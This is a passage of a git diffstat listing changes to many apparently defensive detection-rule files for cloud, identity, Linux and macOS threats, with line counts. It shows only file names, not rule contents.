...ct_interactive_kubernetes_api_request.toml | 25 ++- ...e_creation_in_system_binary_locations.toml | 41 +++-- .../execution_kubeletctl_execution.toml | 7 +- ...stener_established_inside_a_container.toml | 33 +++- ...payload_downloaded_and_piped_to_shell.toml | 36 +++-- ...irect_kubelet_access_via_process_args.toml | 15 +- ...ecutable_via_chmod_inside_a_container.toml | 20 ++- ...ractive_interpreter_command_execution.toml | 84 ++++++---- .../execution_tool_installation.toml | 15 +- ...ication_of_persistence_relevant_files.toml | 64 ++++++-- ..._keys_modification_inside_a_container.toml | 20 ++- ...e_suspicious_echo_or_printf_execution.toml | 107 +++++++++++-- ...ous_webserver_child_process_execution.toml | 71 +++++++-- ...aunched_inside_a_privileged_container.toml | 15 +- ...scape_via_modified_release_agent_file.toml | 15 +- ...commended_events_to_monitor_promotion.toml | 30 +++- ...ration_ml_high_bytes_destination_port.toml | 16 +- ...high_bytes_written_to_external_device.toml | 8 +- ...es_written_to_external_device_airdrop.toml | 8 +- ...re_process_writing_to_external_device.toml | 8 +- ...ml_dga_activity_using_sunburst_domain.toml | 17 +- ...d_control_ml_dga_high_sum_probability.toml | 18 ++- ...l_ml_dns_request_high_dga_probability.toml | 17 +- ..._request_predicted_to_be_a_dga_domain.toml | 17 +- ...istence_suspicious_file_modifications.toml | 54 ++++++- ...ion_gcp_pub_sub_subscription_creation.toml | 10 +- ...collection_gcp_pub_sub_topic_creation.toml | 16 +- ...nse_evasion_gcp_firewall_rule_created.toml | 8 +- ...nse_evasion_gcp_firewall_rule_deleted.toml | 8 +- ...se_evasion_gcp_firewall_rule_modified.toml | 8 +- ...e_evasion_gcp_logging_bucket_deletion.toml | 8 +- ...nse_evasion_gcp_logging_sink_deletion.toml | 8 +- ...ion_gcp_pub_sub_subscription_deletion.toml | 16 +- ...se_evasion_gcp_pub_sub_topic_deletion.toml | 16 +- ...storage_bucket_configuration_modified.toml | 8 +- ...p_storage_bucket_permissions_modified.toml | 39 ++++- 
...virtual_private_cloud_network_deleted.toml | 18 ++- ...p_virtual_private_cloud_route_created.toml | 13 +- ...p_virtual_private_cloud_route_deleted.toml | 13 +- ...tration_gcp_logging_sink_modification.toml | 21 ++- ...l_access_gcp_iam_custom_role_creation.toml | 32 +++- .../gcp/ml_gcp_rare_method_by_city.toml | 20 ++- .../gcp/ml_gcp_rare_method_by_country.toml | 38 ++++- .../gcp/ml_gcp_rare_method_by_user.toml | 56 +++++-- ..._gcp_iam_service_account_key_deletion.toml | 16 +- ...e_gcp_key_created_for_service_account.toml | 8 +- ...rsistence_gcp_service_account_created.toml | 8 +- .../github/execution_github_app_deleted.toml | 21 ++- ..._high_number_of_cloned_repos_from_pat.toml | 21 ++- .../execution_new_github_app_installed.toml | 29 +++- ...ration_high_number_of_cloning_by_user.toml | 20 ++- ...b_repository_activity_from_unusual_ip.toml | 29 +++- ...umber_of_closed_pull_requests_by_user.toml | 12 +- ...protected_branch_force_pushes_by_user.toml | 12 +- ...protected_branch_force_pushes_by_user.toml | 12 +- ...github_actions_bot_first_push_to_repo.toml | 22 ++- ...ub_actions_workflow_injection_blocked.toml | 15 +- ...ss_github_register_self_hosted_runner.toml | 13 +- .../persistence_github_org_owner_added.toml | 33 +++- .../github/persistence_new_pat_created.toml | 12 +- ...tence_organization_owner_role_granted.toml | 23 ++- ...ship_transferred_via_google_workspace.toml | 18 ++- ...yption_key_accessed_by_anonymous_user.toml | 18 ++- ...ed_from_blocklist_in_google_workspace.toml | 12 +- ...d_to_google_workspace_trusted_domains.toml | 17 +- ..._workspace_bitlocker_setting_disabled.toml | 12 +- ...th_login_from_third_party_application.toml | 28 +++- ...marketplace_modified_to_allow_any_app.toml | 12 +- ..._google_workspace_admin_role_deletion.toml | 16 +- ...le_workspace_mfa_enforcement_disabled.toml | 39 ++++- ..._user_added_to_google_workspace_group.toml | 18 ++- ...ogle_workspace_suspended_user_renewed.toml | 28 +++- ...ed_to_external_drive_with_app_consent.toml 
| 41 ++++- ...tion_added_to_google_workspace_domain.toml | 13 +- ..._google_workspace_2sv_policy_disabled.toml | 29 +++- ...workspace_admin_role_assigned_to_user.toml | 23 ++- ..._workspace_api_access_granted_via_dwd.toml | 16 +- ...e_workspace_custom_admin_role_created.toml | 24 ++- ...le_workspace_password_policy_modified.toml | 16 +- ...stence_google_workspace_role_modified.toml | 16 +- ...pace_user_organizational_unit_changed.toml | 23 ++- ...led_for_google_workspace_organization.toml | 16 +- ...ure_arc_proxy_secret_configmap_access.toml | 31 +++- ...covery_denied_service_account_request.toml | 37 ++++- ...mission_enumeration_by_anonymous_user.toml | 20 ++- ...covery_suspicious_self_subject_review.toml | 13 +- ...ymous_create_update_patch_pod_request.toml | 7 +- .../execution_forbidden_creation_request.toml | 18 ++- ...bidden_request_from_unsual_user_agent.toml | 14 +- ...nusual_request_response_by_user_agent.toml | 27 +++- ...l_access_anonymous_request_authorized.toml | 14 +- ...nce_cluster_admin_rolebinding_created.toml | 20 +-- ...ed_service_created_with_type_nodeport.toml | 16 +- ...nsitive_role_creation_or_modification.toml | 20 +-- ..._service_account_bound_to_clusterrole.toml | 20 +-- ...ted_with_excessive_linux_capabilities.toml | 15 +- ...calation_pod_created_with_hostnetwork.toml | 15 +- ...ege_escalation_privileged_pod_created.toml | 15 +- ...nge_followed_by_workload_modification.toml | 15 +- ...e_workload_modification_by_user_agent.toml | 14 +- ..._service_account_rbac_write_operation.toml | 15 +- ...ignment_of_controller_service_account.toml | 15 +- ...ovement_ml_high_mean_rdp_process_args.toml | 15 +- ...ent_ml_high_mean_rdp_session_duration.toml | 15 +- ...ral_movement_ml_high_remote_file_size.toml | 19 ++- ...ml_high_variance_rdp_session_duration.toml | 15 +- ...ovement_ml_rare_remote_file_directory.toml | 8 +- ...ovement_ml_rare_remote_file_extension.toml | 8 +- ...spike_in_connections_from_a_source_ip.toml | 15 +- 
...ke_in_connections_to_a_destination_ip.toml | 15 +- ...al_movement_ml_spike_in_rdp_processes.toml | 15 +- ...ent_ml_spike_in_remote_file_transfers.toml | 8 +- ...nt_ml_unusual_time_for_an_rdp_session.toml | 15 +- ...ilbox_access_by_unusual_client_app_id.toml | 23 ++- ...ion_onedrive_excessive_file_downloads.toml | 12 +- ...arepoint_file_download_via_powershell.toml | 24 ++- ...a_id_device_reg_via_oauth_redirection.toml | 31 +++- ...on_entra_id_susp_oauth2_authorization.toml | 25 ++- ...n_exchange_anti_phish_policy_deletion.toml | 11 +- ...exchange_dkim_signing_config_disabled.toml | 11 +- ...e_evasion_exchange_dlp_policy_removed.toml | 7 +- ..._exchange_exchange_safelinks_disabled.toml | 11 +- ...ange_mailbox_audit_bypass_association.toml | 17 +- ...change_malware_filter_policy_deletion.toml | 8 +- ...sion_exchange_malware_filter_rule_mod.toml | 13 +- ...xchange_new_inbox_rule_delete_or_move.toml | 23 ++- ...on_exchange_safe_attach_rule_disabled.toml | 8 +- ...vasion_mfa_notification_email_deleted.toml | 23 ++- ...on_sharepoint_sharing_policy_weakened.toml | 10 +- ..._teams_custom_app_interaction_allowed.toml | 10 +- ...evasion_teams_external_access_enabled.toml | 10 +- ...tion_exchange_transport_rule_creation.toml | 21 ++- ..._exchange_transport_rule_modification.toml | 21 ++- ...pliance_potential_ransomware_activity.toml | 13 +- ...tra_id_portal_login_impossible_travel.toml | 23 ++- ...sent_grant_via_registered_application.toml | 21 ++- ...via_first_party_microsoft_application.toml | 25 ++- ..._identity_unusual_sso_errors_for_user.toml | 28 +++- ...a_id_global_administrator_role_assign.toml | 23 ++- ...e_exchange_management_role_assignment.toml | 22 ++- ...picious_mailbox_permission_delegation.toml | 23 ++- ...ersistence_teams_guest_access_enabled.toml | 16 +- ...nge_new_or_modified_federation_domain.toml | 23 ++- ...harepoint_site_collection_admin_added.toml | 22 +-- ...l_access_attempted_bypass_of_okta_mfa.toml | 21 ++- 
...mpts_to_brute_force_okta_user_account.toml | 13 +- ...vents_from_single_device_behind_proxy.toml | 28 +++- ..._token_hashes_for_single_okta_session.toml | 21 ++- ...multiple_user_agent_os_authentication.toml | 21 ++- ...ccess_okta_aitm_session_cookie_replay.toml | 24 ++- ...users_with_the_same_device_token_hash.toml | 12 +- ...kta_brute_force_device_token_rotation.toml | 8 +- ...ta_mfa_bombing_via_push_notifications.toml | 21 ++- ...l_okta_bombing_via_push_notifications.toml | 21 ++- ...tial_access_user_impersonation_access.toml | 19 ++- ...tempt_to_deactivate_okta_network_zone.toml | 17 +- ..._app_client_credential_token_exchange.toml | 17 +- ...kta_attempt_to_deactivate_okta_policy.toml | 17 +- ...ttempt_to_deactivate_okta_policy_rule.toml | 12 +- ...on_okta_attempt_to_delete_okta_policy.toml | 33 +++- ...ta_attempt_to_delete_okta_policy_rule.toml | 12 +- ...a_attempt_to_modify_okta_network_zone.toml | 12 +- ...on_okta_attempt_to_modify_okta_policy.toml | 17 +- ...ta_attempt_to_modify_okta_policy_rule.toml | 12 +- ...ser_password_reset_or_unlock_attempts.toml | 20 ++- ...ttempt_to_deactivate_okta_application.toml | 21 ++- ...ta_attempt_to_delete_okta_application.toml | 21 ++- ...ta_attempt_to_modify_okta_application.toml | 14 +- .../okta/impact_possible_okta_dos_attack.toml | 13 +- ...rrence_user_session_started_via_proxy.toml | 31 +++- ...initial_access_okta_fastpass_phishing.toml | 8 +- ...ta_user_attempted_unauthorized_access.toml | 11 +- ...ss_sign_in_events_via_third_party_idp.toml | 26 ++- ...cation_sso_from_unknown_client_device.toml | 24 ++- ...icious_activity_reported_by_okta_user.toml | 41 +---- ...ent_multiple_sessions_for_single_user.toml | 23 ++- ...tor_privileges_assigned_to_okta_group.toml | 21 ++- ...inistrator_role_assigned_to_okta_user.toml | 24 ++- ...ence_attempt_to_create_okta_api_token.toml | 15 +- ...set_mfa_factors_for_okta_user_account.toml | 21 ++- ...mfa_deactivation_with_no_reactivation.toml | 23 ++- 
...e_new_idp_successfully_added_by_admin.toml | 33 +++- ..._or_delete_application_sign_on_policy.toml | 24 ++- ...unt_privileged_process_events_by_user.toml | 8 +- ..._process_command_line_entropy_by_user.toml | 16 +- ...l_linux_rare_process_executed_by_user.toml | 8 +- ..._high_sum_concurrent_sessions_by_user.toml | 16 +- ...access_ml_okta_rare_host_name_by_user.toml | 24 ++- ...cess_ml_okta_rare_region_name_by_user.toml | 21 ++- ...access_ml_okta_rare_source_ip_by_user.toml | 21 ++- ..._group_application_assignment_changes.toml | 16 +- ...okta_spike_in_group_lifecycle_changes.toml | 29 +++- ...kta_spike_in_group_membership_changes.toml | 19 ++- ...okta_spike_in_group_privilege_changes.toml | 16 +- ..._in_user_lifecycle_management_changes.toml | 21 ++- ...ws_high_count_group_management_events.toml | 24 ++- ...ndows_high_count_special_logon_events.toml | 8 +- ...gh_count_special_privilege_use_events.toml | 19 ++- ..._count_user_account_management_events.toml | 24 ++- ...access_ml_windows_rare_device_by_user.toml | 16 +- ...ss_ml_windows_rare_group_name_by_user.toml | 32 +++- ...ndows_rare_privilege_assigned_to_user.toml | 19 ++- ...s_ml_windows_rare_region_name_by_user.toml | 16 +- ...ess_ml_windows_rare_source_ip_by_user.toml | 16 +- ..._ml_rare_process_for_a_parent_process.toml | 8 +- ...se_evasion_ml_rare_process_for_a_user.toml | 8 +- ...ous_windows_process_cluster_from_host.toml | 8 +- ...s_process_cluster_from_parent_process.toml | 8 +- ...ous_windows_process_cluster_from_user.toml | 8 +- ...and_control_aws_cli_endpoint_url_used.toml | 8 +- ...mand_and_control_cat_network_activity.toml | 12 +- ...and_control_cupsd_foomatic_rip_netcon.toml | 25 ++- ...and_control_curl_socks_proxy_detected.toml | 12 +- ...ent_egress_netcon_from_sus_executable.toml | 20 ++- ..._git_repo_or_file_download_to_sus_dir.toml | 12 +- ...nd_and_control_ip_forwarding_activity.toml | 12 +- ...ntrol_kubectl_networking_modification.toml | 12 +- ..._control_linux_chisel_client_activity.toml 
| 7 +- ...mand_and_control_linux_kworker_netcon.toml | 8 +- ...nd_control_linux_proxychains_activity.toml | 12 +- ..._and_control_linux_ssh_x11_forwarding.toml | 21 ++- ...linux_suspicious_proxychains_activity.toml | 12 +- ...l_linux_tunneling_and_port_forwarding.toml | 17 +- ...ontrol_linux_tunneling_via_ssh_option.toml | 7 +- ...trol_potential_tunneling_command_line.toml | 7 +- ...work_activity_from_unknown_executable.toml | 29 +++- ...mand_and_control_telegram_api_request.toml | 40 +++-- ...d_and_control_tunneling_via_earthworm.toml | 7 +- ...ess_aws_creds_search_inside_container.toml | 28 +++- ...ial_access_collection_sensitive_files.toml | 8 +- ...ve_files_compression_inside_container.toml | 7 +- .../credential_access_credential_dumping.toml | 15 +- ...ntial_access_gdb_init_process_hooking.toml | 15 +- ...credential_access_gdb_process_hooking.toml | 23 ++- .../credential_access_gh_auth_via_nodejs.toml | 30 +++- ...ernetes_service_account_secret_access.toml | 28 +++- ...edential_access_manual_memory_dumping.toml | 15 +- ...tential_linux_ssh_bruteforce_internal.toml | 20 ++- ...ntial_successful_linux_ssh_bruteforce.toml | 15 +- ...ential_access_proc_credential_dumping.toml | 15 +- ..._or_passwords_search_inside_container.toml | 15 +- .../credential_access_ssh_backdoor_log.toml | 20 ++- ...cess_ssh_password_grabbing_via_strace.toml | 7 +- ...instance_metadata_service_api_request.toml | 20 ++- ...ion_attempt_to_disable_auditd_service.toml | 15 +- ...tempt_to_disable_iptables_or_firewall.toml | 20 ++- ...ion_attempt_to_disable_syslog_service.toml | 15 +- ...evasion_authorized_keys_file_deletion.toml | 15 +- ..._base32_encoding_or_decoding_activity.toml | 20 ++- ...ense_evasion_base64_decoding_activity.toml | 7 +- ...defense_evasion_bpf_program_tampering.toml | 12 +- ...sion_curl_or_wget_executed_via_lolbin.toml | 68 ++++---- ...nse_evasion_directory_creation_in_bin.toml | 12 +- ...doas_configuration_creation_or_rename.toml | 20 ++- 
..._evasion_dynamic_linker_file_creation.toml | 20 ++- ...fense_evasion_file_deletion_via_shred.toml | 14 +- ...defense_evasion_file_mod_writable_dir.toml | 8 +- ...hex_payload_execution_via_commandline.toml | 7 +- ...ion_hex_payload_execution_via_utility.toml | 12 +- ...on_interactive_shell_from_system_user.toml | 37 ++++- ...rpreter_launched_from_decoded_payload.toml | 84 +++++----- ...defense_evasion_kill_command_executed.toml | 55 ++++--- ...defense_evasion_kthreadd_masquerading.toml | 7 +- .../defense_evasion_ld_preload_cmdline.toml | 91 ++++++----- .../linux/defense_evasion_ld_so_creation.toml | 12 +- .../defense_evasion_log_files_deleted.toml | 7 +- .../defense_evasion_mount_execution.toml | 7 +- ...evasion_multi_base64_decoding_attempt.toml | 79 ++++----- ...asion_potential_kubectl_impersonation.toml | 35 ++-- ...vasion_potential_kubectl_masquerading.toml | 38 ++++- .../defense_evasion_rename_esxi_files.toml | 15 +- ...s_utility_executed_via_tmux_or_screen.toml | 46 +++++- ...fense_evasion_suspicious_path_mounted.toml | 7 +- ...vasion_symlink_binary_to_writable_dir.toml | 41 +++-- ...vasion_sysctl_kernel_feature_activity.toml | 27 ++-- ...ense_evasion_unusual_preload_env_vars.toml | 19 ++- ...efense_evasion_user_or_group_deletion.toml | 15 +- ...r_log_file_creation_by_unsual_process.toml | 13 +- .../discovery_docker_socket_discovery.toml | 15 +- .../discovery_dynamic_linker_via_od.toml | 25 ++- .../discovery_esxi_software_via_find.toml | 7 +- .../discovery_esxi_software_via_grep.toml | 7 +- ...ion_discovery_via_kprobes_and_tracefs.toml | 7 +- .../discovery_kernel_module_enumeration.toml | 8 +- rules/linux/discovery_kernel_seeking.toml | 15 +- rules/linux/discovery_kernel_unpacking.toml | 7 +- .../discovery_kubeconfig_file_discovery.toml | 25 ++- ...iscovery_kubectl_permission_discovery.toml | 7 +- .../linux/discovery_linux_hping_activity.toml | 10 +- .../linux/discovery_linux_nping_activity.toml | 16 +- ..._mount_discovery_via_exports_or_fstab.toml | 7 +- 
.../discovery_pam_version_discovery.toml | 7 +- .../linux/discovery_ping_sweep_detected.toml | 8 +- .../discovery_polkit_version_discovery.toml | 7 +- ...ivate_key_password_searching_activity.toml | 12 +- .../linux/discovery_process_capabilities.toml | 7 +- ...curity_file_access_via_common_utility.toml | 25 ++- ...anning_activity_from_compromised_host.toml | 7 +- ...very_sudo_allowed_command_enumeration.toml | 29 +++- ...overy_suspicious_memory_grep_activity.toml | 7 +- ...etwork_tool_launched_inside_container.toml | 15 +- ...ry_suspicious_which_command_execution.toml | 13 +- ...overy_unusual_user_enumeration_via_id.toml | 22 ++- ...covery_virtual_machine_fingerprinting.toml | 30 +++- .../discovery_yum_dnf_plugin_detection.toml | 12 +- ...tion_abnormal_process_id_file_created.toml | 19 ++- ...ment_binary_launched_inside_container.toml | 15 +- ...tion_cupsd_foomatic_rip_file_creation.toml | 12 +- ..._cupsd_foomatic_rip_lp_user_execution.toml | 12 +- ...on_cupsd_foomatic_rip_shell_execution.toml | 15 +- ...omatic_rip_suspicious_child_execution.toml | 70 +++++++- ...nnection_from_entrypoint_in_container.toml | 15 +- .../execution_executable_stack_execution.toml | 15 +- ...n_file_execution_followed_by_deletion.toml | 33 +++- ...executable_via_chmod_inside_container.toml | 30 +++- ...er_or_listener_established_via_netcat.toml | 33 +++- .../execution_kubectl_apply_pod_from_url.toml | 12 +- ...s_direct_api_request_via_curl_or_wget.toml | 25 ++- .../execution_nc_listener_via_rlwrap.toml | 15 +- ...ion_netcon_from_rwx_mem_region_binary.toml | 20 ++- ...cution_network_event_post_compilation.toml | 7 +- rules/linux/execution_perl_tty_shell.toml | 7 +- ...xecution_potential_hack_tool_executed.toml | 83 +++++++++- ..._overly_permissive_container_creation.toml | 8 +- ...rocess_backgrounded_by_unusual_parent.toml | 18 ++- ..._process_started_from_process_id_file.toml | 26 ++- ...ss_started_in_shared_memory_directory.toml | 15 +- rules/linux/execution_python_tty_shell.toml | 7 +- 
..._remote_code_execution_via_postgresql.toml | 15 +- .../execution_shell_evasion_linux_binary.toml | 18 ++- ...cution_shell_openssl_client_or_server.toml | 12 +- ...xecution_shell_via_background_process.toml | 7 +- ...ion_shell_via_child_tcp_utility_linux.toml | 7 +- ...on_shell_via_lolbin_interpreter_linux.toml | 12 +- ...execution_shell_via_meterpreter_linux.toml | 30 +++- ...execution_shell_via_suspicious_binary.toml | 7 +- ...ution_shell_via_tcp_cli_utility_linux.toml | 7 +- ...ution_shell_via_udp_cli_utility_linux.toml | 17 +- ...traction_or_decrompression_via_funzip.toml | 7 +- ...us_executable_running_system_commands.toml | 39 ++++- ...icious_mining_process_creation_events.toml | 33 +++- ..._container_creation_command_execution.toml | 77 ++++++++- ..._system_binary_file_permission_change.toml | 38 ++++- rules/linux/execution_tc_bpf_filter.toml | 20 ++- ...nknown_rwx_mem_region_binary_executed.toml | 19 ++- .../execution_unusual_kthreadd_execution.toml | 48 ++++-- ...ual_path_invocation_from_command_line.toml | 13 +- .../execution_unusual_pkexec_execution.toml | 24 ++- ...tion_potential_curl_data_exfiltration.toml | 30 ++-- ...ntial_data_splitting_for_exfiltration.toml | 7 +- ...filtration_potential_database_dumping.toml | 36 +++-- ...tion_potential_wget_data_exfiltration.toml | 31 ++-- ...nusual_file_transfer_utility_launched.toml | 17 +- .../impact_data_encrypted_via_openssl.toml | 15 +- .../impact_memory_swap_modification.toml | 7 +- ...otential_bruteforce_malware_infection.toml | 15 +- .../linux/impact_process_kill_threshold.toml | 19 ++- ...e_2023_50164_exploitation_to_webshell.toml | 21 ++- ..._first_time_public_key_authentication.toml | 30 +++- ...sful_ssh_authentication_by_unusual_ip.toml | 25 ++- ...ul_ssh_authentication_by_unusual_user.toml | 30 +++- ...ccess_telnet_auth_bypass_envar_auditd.toml | 19 ++- ...ess_telnet_auth_bypass_via_user_envar.toml | 19 ++- ...ral_movement_kubeconfig_file_activity.toml | 26 ++- 
...ote_file_creation_world_writeable_dir.toml | 14 +- ...lateral_movement_ssh_it_worm_download.toml | 15 +- ...ment_telnet_network_activity_external.toml | 15 +- ...movement_unusual_remote_file_creation.toml | 14 +- ...istence_apt_package_manager_execution.toml | 7 +- ...nce_apt_package_manager_file_creation.toml | 20 ++- ...ersistence_apt_package_manager_netcon.toml | 20 ++- rules/linux/persistence_at_job_creation.toml | 38 +---- rules/linux/persistence_boot_file_copy.toml | 10 +- .../persistence_bpf_program_or_map_load.toml | 20 ++- .../persistence_chkconfig_service_add.toml | 7 +- ...credential_access_modify_ssh_binaries.toml | 7 +- .../linux/persistence_cron_job_creation.toml | 38 +---- .../persistence_dbus_service_creation.toml | 12 +- ...e_dbus_unsual_daemon_parent_execution.toml | 7 +- ..._package_manager_plugin_file_creation.toml | 30 +++- ...kage_installation_from_unusual_parent.toml | 19 ++- .../persistence_dpkg_unusual_execution.toml | 32 +++- .../persistence_dracut_module_creation.toml | 7 +- .../persistence_dynamic_linker_backup.toml | 20 ++- .../linux/persistence_git_hook_execution.toml | 7 +- .../persistence_git_hook_file_creation.toml | 7 +- rules/linux/persistence_git_hook_netcon.toml | 20 ++- ...ersistence_git_hook_process_execution.toml | 7 +- ...rsistence_grub_configuration_creation.toml | 15 +- rules/linux/persistence_grub_makeconfig.toml | 15 +- .../persistence_init_d_file_creation.toml | 25 ++- ...ersistence_kde_autostart_modification.toml | 7 +- .../linux/persistence_kernel_driver_load.toml | 26 ++- ...stence_kernel_driver_load_by_non_root.toml | 20 ++- ...nel_module_load_from_unusual_location.toml | 20 ++- ...rsistence_kernel_object_file_creation.toml | 19 ++- ...ce_kubernetes_sensitive_file_activity.toml | 51 ++++-- .../persistence_kworker_file_creation.toml | 12 +- ...sistence_linux_backdoor_user_creation.toml | 20 ++- .../persistence_linux_group_creation.toml | 12 +- ...e_linux_shell_activity_via_web_server.toml | 15 +- 
..._linux_user_added_to_privileged_group.toml | 30 +++- .../persistence_manual_dracut_execution.toml | 15 +- ...rsistence_message_of_the_day_creation.toml | 15 +- ...sistence_message_of_the_day_execution.toml | 43 ++++- ...etwork_manager_dispatcher_persistence.toml | 7 +- ...stence_openssl_passwd_hash_generation.toml | 7 +- ...ggable_authentication_module_creation.toml | 17 +- ...cation_module_creation_in_unusual_dir.toml | 17 +- ...ication_module_pam_exec_backdoor_exec.toml | 25 ++- ...authentication_module_source_download.toml | 20 ++- .../persistence_polkit_policy_creation.toml | 20 ++- ...persistence_script_executable_bit_set.toml | 30 +++- ...nce_process_capability_set_via_setcap.toml | 20 ++- .../linux/persistence_pth_file_creation.toml | 25 ++- ...persistence_rc_local_error_via_syslog.toml | 20 ++- ...ence_rc_local_service_already_running.toml | 20 ++- .../linux/persistence_rc_script_creation.toml | 20 ++- ...sistence_setuid_setgid_capability_set.toml | 20 ++- .../persistence_shadow_file_modification.toml | 12 +- .../persistence_shared_object_creation.toml | 37 ++++- ...ence_shell_configuration_modification.toml | 20 ++- ...simple_web_server_connection_accepted.toml | 76 +++++---- ...ersistence_simple_web_server_creation.toml | 12 +- ...site_and_user_customize_file_creation.toml | 25 ++- rules/linux/persistence_ssh_netcon.toml | 7 +- ...stence_ssh_via_backdoored_system_user.toml | 39 ++++- ...suspicious_file_opened_through_editor.toml | 43 ++++- ...e_suspicious_ssh_execution_xzbackdoor.toml | 20 ++- ...ersistence_systemd_generator_creation.toml | 12 +- rules/linux/persistence_systemd_netcon.toml | 15 +- ...tence_systemd_scheduled_timer_created.toml | 20 ++- .../persistence_systemd_service_creation.toml | 20 +-- .../persistence_systemd_service_started.toml | 19 ++- .../persistence_systemd_shell_execution.toml | 20 ++- ...ersistence_tainted_kernel_module_load.toml | 20 ++- ...ainted_kernel_module_out_of_tree_load.toml | 20 ++- 
.../linux/persistence_udev_rule_creation.toml | 25 ++- ...ce_unpack_initramfs_via_unmkinitramfs.toml | 17 +- ...rsistence_unusual_exim4_child_process.toml | 27 +++- .../persistence_unusual_pam_grantor.toml | 18 ++- ...ersistence_unusual_sshd_child_process.toml | 19 ++- ...user_credential_modification_via_echo.toml | 15 +- ...ser_or_group_creation_or_modification.toml | 25 ++- ...sistence_web_server_sus_child_spawned.toml | 30 +++- ...ence_web_server_sus_command_execution.toml | 15 +- ...tence_web_server_sus_destination_port.toml | 39 +++-- ..._web_server_unusual_command_execution.toml | 14 +- .../persistence_xdg_autostart_netcon.toml | 20 ++- ..._package_manager_plugin_file_creation.toml | 7 +- ...on_chown_chmod_unauthorized_file_read.toml | 20 ++- ...ation_container_util_misconfiguration.toml | 15 +- ...cve_2025_32463_nsswitch_file_creation.toml | 12 +- ..._cve_2025_32463_sudo_chroot_execution.toml | 30 +++- ...scalation_cve_2025_41244_vmtoolsd_lpe.toml | 12 +- .../privilege_escalation_dac_permissions.toml | 29 +++- ...ion_debugfs_launched_inside_container.toml | 15 +- ...calation_docker_release_file_creation.toml | 20 ++- ...calation_enlightenment_window_manager.toml | 13 +- ...e_escalation_gdb_sys_ptrace_elevation.toml | 10 +- ...lege_escalation_gdb_sys_ptrace_netcon.toml | 31 +++- ...lege_escalation_kworker_uid_elevation.toml | 18 ++- ...lation_ld_preload_shared_object_modif.toml | 37 ++++- ...lation_linux_suspicious_symbolic_link.toml | 33 +++- ...n_load_and_unload_of_kernel_via_kexec.toml | 7 +- ...alation_looney_tunables_cve_2023_4911.toml | 13 +- ...ge_escalation_overlayfs_local_privesc.toml | 8 +- ...vilege_escalation_pkexec_envar_hijack.toml | 23 ++- ...tion_potential_suid_sgid_exploitation.toml | 20 ++- ...n_potential_suid_sgid_proxy_execution.toml | 22 ++- ...lation_potential_wildcard_shell_spawn.toml | 12 +- ...ge_escalation_sda_disk_mount_non_root.toml | 28 +++- ...on_snap_confine_lpe_via_cve_2026_3888.toml | 7 +- 
...vilege_escalation_sudo_cve_2019_14287.toml | 12 +- .../privilege_escalation_sudo_hijacking.toml | 20 ++- ...tion_sudo_token_via_process_injection.toml | 35 +++- ...uspicious_cap_setuid_python_execution.toml | 20 ++- ...ion_suspicious_chown_fowner_elevation.toml | 24 ++- ...calation_suspicious_passwd_file_write.toml | 21 ++- ...alation_suspicious_uid_guid_elevation.toml | 20 ++- ...scalation_uid_change_post_compilation.toml | 12 +- ...uid_elevation_from_unknown_executable.toml | 13 +- ...lation_unshare_namespace_manipulation.toml | 7 +- ...ege_escalation_writable_docker_socket.toml | 16 +- ...ery_output_written_to_suspicious_file.toml | 54 ++++--- ...e_file_access_followed_by_compression.toml | 47 +++--- ..._control_aws_s3_connection_via_script.toml | 70 +++++--- ...control_google_calendar_c2_via_script.toml | 74 +++++---- ...rol_network_connection_to_oast_domain.toml | 65 ++++++-- ...trol_perl_outbound_network_connection.toml | 47 +++--- ..._and_control_potential_etherhiding_c2.toml | 84 +++++----- ...reter_connection_to_non_standard_port.toml | 61 +++---- ...uspicious_curl_from_macos_application.toml | 46 ++++-- ..._suspicious_curl_to_google_app_script.toml | 50 +++--- ..._outbound_network_via_unsigned_binary.toml | 36 +++-- ..._connection_to_suspicious_web_service.toml | 34 +++- ...dential_access_dumping_hashes_bi_cmds.toml | 8 +- ...dential_access_high_volume_of_pbpaste.toml | 16 +- .../credential_access_kerberosdump_kcc.toml | 10 +- ...s_keychain_pwd_retrieval_security_cmd.toml | 12 +- ...ential_access_mitm_localhost_webproxy.toml | 19 ++- ...access_potential_macos_ssh_bruteforce.toml | 16 +- ...al_access_promt_for_pwd_via_osascript.toml | 23 ++- ...ensitive_file_access_first_occurrence.toml | 30 +++- ...ous_web_browser_sensitive_file_access.toml | 18 ++- .../credential_access_systemkey_dumping.toml | 18 ++- ...vasion_apple_softupdates_modification.toml | 10 +- ...evasion_attempt_del_quarantine_attrib.toml | 17 +- 
...evasion_attempt_to_disable_gatekeeper.toml | 8 +- ..._evasion_dylib_injection_via_env_vars.toml | 68 +++++--- ...ion_gatekeeper_override_and_execution.toml | 68 +++++--- ..._evasion_modify_environment_launchctl.toml | 12 +- ...cy_controls_tcc_database_modification.toml | 17 +- ...tion_privacy_pref_sshd_fulldiskaccess.toml | 19 ++- .../defense_evasion_safari_config_change.toml | 10 +- ...dboxed_office_app_suspicious_zip_file.toml | 15 +- ...evasion_suspicious_tcc_access_granted.toml | 60 ++++--- ...vasion_tcc_bypass_mounted_apfs_access.toml | 16 +- .../discovery_full_disk_access_check.toml | 60 ++++--- .../macos/discovery_suspicious_sip_check.toml | 58 ++++--- ...ystem_and_network_configuration_check.toml | 26 +-- ...covery_users_domain_built_in_commands.toml | 15 +- ...vasion_electron_app_childproc_node_js.toml | 11 +- ...l_access_suspicious_browser_childproc.toml | 44 ++++- ...staller_package_spawned_network_event.toml | 30 +++- ...n_python_shell_spawn_first_occurrence.toml | 10 +- ...cution_script_via_automator_workflows.toml | 8 +- ...ing_osascript_exec_followed_by_netcon.toml | 15 +- ...n_shell_execution_via_apple_scripting.toml | 13 +- ...ution_unusual_library_load_via_python.toml | 31 ++-- ...uspicious_mac_ms_office_child_process.toml | 48 +++++- ...ential_access_kerberos_bifrostconsole.toml | 51 +++++- ...ral_movement_remote_ssh_login_enabled.toml | 18 ++- ...ment_suspicious_curl_to_jamf_endpoint.toml | 56 ++++--- ...teral_movement_vpn_connection_attempt.toml | 16 +- ...stence_account_creation_hide_at_logon.toml | 29 +++- ...sistence_apple_mail_rule_modification.toml | 47 ++++-- ...ce_creation_change_launch_agents_file.toml | 26 ++- ..._creation_hidden_login_item_osascript.toml | 16 +- ..._access_authorization_plugin_creation.toml | 18 ++- rules/macos/persistence_crontab_creation.toml | 23 ++- ...ence_curl_execution_via_shell_profile.toml | 60 ++++--- ...launch_agent_deamon_logonitem_process.toml | 15 +- ...rectory_services_plugins_modification.toml | 8 
